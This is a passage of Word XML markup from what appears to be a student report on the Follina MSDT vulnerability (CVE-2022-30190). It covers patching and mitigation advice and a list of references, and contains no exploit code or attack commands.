          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="000B3A0B" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DISCUSSION OF POSSIBLE FIXES/ PATCHES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FABAB40" w14:textId="51F86B38" w:rsidR="00FD7AA2" w:rsidRPr="00FD7AA2" w:rsidRDefault="00FD7AA2" w:rsidP="00E115DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>On June 14, 2022, Microsoft released cumulative updates. It is highly advised that customers install the July updates as soon as they can. It is also recommended that users apply the most recent security updates from Microsoft and verify the support lifecycle of their devices</w:t>
      </w:r>
      <w:r w:rsidR="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [6]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FDCE9A" w14:textId="77777777" w:rsidR="00FD7AA2" w:rsidRPr="00FD7AA2" w:rsidRDefault="00FD7AA2" w:rsidP="00E115DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>There are a number of mitigation techniques that can be used to lessen the impact of similar attacks in the future. Disabling the MSDT file handler using registry edits is one practical solution. Putting attack surface reduction rules into place can also be helpful; one such rule should prevent the spawning of any child processes from Microsoft Office apps. It is important to keep an eye on how Microsoft Word (winword.exe) behaves because it normally shouldn't be launching a child process called "msdt.exe". Recognizing any odd child process activity—like "diagnost.exe" and its following commands—can aid in threat identification and neutralization early on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55697874" w14:textId="5E619A40" w:rsidR="009001A3" w:rsidRPr="009001A3" w:rsidRDefault="00FD7AA2" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Security training and user awareness are crucial, as the persistent problem of security threats highlights. Users need to be constantly reminded to be cautious when they get questionable emails because these kinds of threats are continuous and will probably continue. Users need to exercise caution and vigilance while interacting via email to avoid security lapses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D21D7" w14:textId="299D6753" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="009614D3" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="00CE329E" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>EXPLORATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F16F260" w14:textId="3ED4189F" w:rsidR="000E09FC" w:rsidRPr="009001A3" w:rsidRDefault="00FD7AA2" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Before June 2022, all Microsoft Windows devices, including Windows 10, 11, and servers, were susceptible to a zero-day, zero-touch flaw. Microsoft addressed the issue, which was unique to the attacker's targets, in their June 2022 release</w:t>
      </w:r>
      <w:r w:rsidR="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [6]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A95317" w14:textId="2C42FB1E" w:rsidR="005F6209" w:rsidRDefault="009614D3" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidR="005F6209" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>REFRENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE56FE7" w14:textId="5322F72F" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">“CVE - CVE-2022-30190,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>cve.mitre.org</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="423BB5F1" w14:textId="77DD2DA8" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>K. Beaumont, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Follina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a Microsoft Office code execution vulnerability,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, May 31, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="629B7448" w14:textId="23E2FBC6" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">“CVE Website,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>www.cve.org</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, Jun. 01, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://www.cve.org/CVERecord?id=CVE-2022-30190</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="333CE155" w14:textId="497FC991" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Nao_sec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>, “https://twitter.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>nao_sec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">/status/1530196847679401984,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, May 27, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://twitter.com/nao_sec/status/1530196847679401984</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BF4F344" w14:textId="5BEAA3B6" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>J. Hammond, “Rapid Response: Microsoft Office RCE - ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Follina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">’ MSDT Attack,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>www.huntress.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, May 30, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="272EA23A" w14:textId="408781CE" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">“Security Update Guide - Microsoft Security Response </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msrc.microsoft.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, Jun. 14, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="333A75E1" w14:textId="14BEB64D" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">“Microsoft Office Word MSDTJS Code Execution ≈ Packet Storm,” </w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>packetstormsecurity.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, Jun. 07, 2022. </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00A238D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>https://packetstormsecurity.com/files/167438/Microsoft-Office-Word-MSDTJS-Code-Execution.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E98C36F" w14:textId="62A25487" w:rsidR="005F6209" w:rsidRPr="00A238D7" w:rsidRDefault="005F6209" w:rsidP="005F6209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">“Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability | MSRC Blog | Microsoft Security Response </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
